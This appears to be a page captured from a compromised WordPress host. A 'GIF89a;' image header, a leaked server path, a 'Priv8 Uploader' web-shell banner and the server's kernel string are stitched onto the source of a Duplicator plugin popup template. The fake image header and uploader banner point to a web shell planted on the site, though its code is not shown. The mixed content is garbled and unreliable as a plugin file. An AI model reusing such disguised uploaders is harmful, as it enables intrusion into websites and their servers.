GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/**
* @package Duplicator
*/
defined("ABSPATH") || exit;
use Duplicator\Core\Views\TplMng;
use Duplicator\Utils\Upsell;
/**
* Variables
*
* @var \Duplicator\Core\Views\TplMng $tplMng
* @var array<string, mixed> $tplData
*/
?>
<div class="static-popup">
<div class="static-popup-content-top-notice">
<i class="fas fa-exclamation-triangle"></i><?php echo $tplData['warning-text']; ?>
</div>
<div class="static-popup-content">
<h2>
<?php echo $tplData['title']; ?>
</h2>
<?php echo TplMng::getInstance()->render($tplData['content-tpl']); ?>
</div>
<div class="static-popup-button">
<a href="<?php echo esc_url($tplData['upsell-url']); ?>" class="dup-btn-green dup-btn-lg dup-btn" target="_blank" rel="noopener noreferrer">
<?php echo __('Upgrade to Duplicator Pro Now', 'duplicator'); ?>
</a>
</div>
</div>